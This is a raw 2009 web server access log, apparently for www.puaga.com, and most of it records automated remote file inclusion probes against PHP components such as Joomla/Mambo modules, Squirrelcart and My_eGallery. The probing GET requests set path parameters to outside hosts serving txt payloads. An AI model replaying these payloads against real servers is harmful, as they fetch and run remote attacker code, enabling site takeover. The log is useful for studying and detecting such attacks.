70.85.213.106 - - [05/Jul/2009:05:17:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:18:05 -0700] "GET /logs/access_090527.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:18:07 -0700] "GET /logs/access_090527.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:18:50 -0700] "GET /logs/access_090524.log//squirrelcart/cart_content.php?cart_isp_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:18:51 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:18:51 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:19:00 -0700] "GET /logs/access_090510.log//squirrelcart/cart_content.php?cart_isp_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:02 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:02 -0700] "GET /logs/access_090530.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:13 -0700] "GET /logs/access_090510.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:21 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:21 -0700] "GET /logs/access_090530.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:23 -0700] "GET /logs/access_090530.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:34 -0700] "GET /logs/access_090510.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:19:35 -0700] "GET /logs/access_090510.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:21:22 -0700] "GET /logs/common/db.php?commonpath=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:21:22 -0700] "GET /logs/access_090521.log/common/db.php?commonpath=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:21:25 -0700] "GET /common/db.php?commonpath=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:21:25 -0700] "GET /logs/access_090525.log/common/db.php?commonpath=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:21:33 -0700] "GET /logs/access_090530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:21:49 -0700] "GET /logs/access_090510.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:21:52 -0700] "GET /logs/access_090530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:21:59 -0700] "GET /logs/access_090530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:22:11 -0700] "GET /logs/access_090510.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:05:22:15 -0700] "GET /logs/access_090510.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:37 -0700] "GET /logs/access_090622.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:37 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:37 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:38 -0700] "GET /logs/access_090531.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:43 -0700] "GET /logs/access_090622.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:44 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:44 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:23:44 -0700] "GET /logs/access_090531.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.85.213.106 - - [05/Jul/2009:05:24:18 -0700] "GET /logs/access_090523.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:25:25 -0700] "GET /logs/access_090612.log/index.php?inhalt=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:25:29 -0700] "GET /logs/access_090526.log/index.php?inhalt=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:27:07 -0700] "GET /logs/access_090622.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:27:07 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:27:07 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:27:08 -0700] "GET /logs/access_090531.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
193.47.80.48 - - [05/Jul/2009:05:27:33 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.atesh.info"
193.47.80.48 - - [05/Jul/2009:05:27:35 -0700] "GET / HTTP/1.1" 200 3355 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.atesh.info"
88.191.37.60 - - [05/Jul/2009:05:28:08 -0700] "GET /logs/access_090612.log/index.php?inhalt=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:28:13 -0700] "GET /logs/access_090526.log/index.php?inhalt=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:30:44 -0700] "GET /logs/bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:30:44 -0700] "GET /logs/access_090524.log%20%20/bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:30:44 -0700] "GET /bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:30:51 -0700] "GET /logs/access_090531.log%20%20/bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:33:11 -0700] "GET /logs/access_090524.log/errors.php?error=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:33:11 -0700] "GET /logs/errors.php?error=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:33:12 -0700] "GET /logs/access_090531.log/errors.php?error=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:33:16 -0700] "GET /errors.php?error=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:43 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:43 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:43 -0700] "GET /logs/access_090518.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:46 -0700] "GET /logs/access_090518.log%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:46 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:47 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:48 -0700] "GET /logs/access_090610.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:35:51 -0700] "GET /logs/access_090610.log%20%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:36:12 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:36:12 -0700] "GET /logs/access_090518.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:36:12 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:05:36:16 -0700] "GET /logs/access_090610.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.236.47.188 - - [05/Jul/2009:05:37:41 -0700] "GET /logs/access_090520.log/index.php?_SERVER[DOCUMENT_ROOT]=http://www.chfeel.com/chfeel/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.236.47.188 - - [05/Jul/2009:05:37:41 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.chfeel.com/chfeel/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.236.47.188 - - [05/Jul/2009:05:37:42 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.chfeel.com/chfeel/bbs/id1.txt?? HTTP/1.0" 200 6109 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:38:26 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:38:26 -0700] "GET /logs/access_090624.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:38:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:39:26 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
222.236.47.188 - - [05/Jul/2009:05:39:48 -0700] "GET /logs/access_090519.log/index.php?_SERVER[DOCUMENT_ROOT]=http://www.chfeel.com/chfeel/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:39:52 -0700] "GET /logs/access_090531.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:39:57 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:39:57 -0700] "GET /logs///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:39:57 -0700] "GET /logs/access_090520.log///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:40:11 -0700] "GET /logs/access_090605.log///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:40:29 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:40:29 -0700] "GET /logs/access_090521.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:40:29 -0700] "GET /logs/access_090622.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:40:30 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
217.237.151.117 - - [05/Jul/2009:05:41:04 -0700] "GET /logs HTTP/1.0" 301 73 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.117 - - [05/Jul/2009:05:41:05 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.117 - - [05/Jul/2009:05:41:05 -0700] "GET /favicon.ico HTTP/1.0" 200 1406 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.117 - - [05/Jul/2009:05:41:28 -0700] "GET /logs/access_090703.log HTTP/1.0" 200 1223183 "http://www.puaga.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.118 - - [05/Jul/2009:05:41:39 -0700] "GET /logs/access_090704.log HTTP/1.0" 200 1354570 "http://www.puaga.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.117 - - [05/Jul/2009:05:41:56 -0700] "GET /logs/access_090705.log HTTP/1.0" 200 1484317 "http://www.puaga.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
217.237.151.118 - - [05/Jul/2009:05:41:59 -0700] "GET /logs/access.log HTTP/1.0" 200 46675 "http://www.puaga.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:42:01 -0700] "GET /logs/access_090526.log/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:42:09 -0700] "GET /logs/access_090612.log/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:43:50 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:43:50 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:43:50 -0700] "GET /logs/access_090623.log//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:05:44:19 -0700] "GET /logs/access_090527.log//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:46:19 -0700] "GET /logs/access_090524.log/bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.117.128.143 - - [05/Jul/2009:05:46:21 -0700] "GET /logs/access_090531.log/bbshop/shop/index.php?page=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:43 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:43 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:43 -0700] "GET /logs/access_090620.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 4949 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 4949 "-" "libwww-perl/5.805" "www.puaga.com"
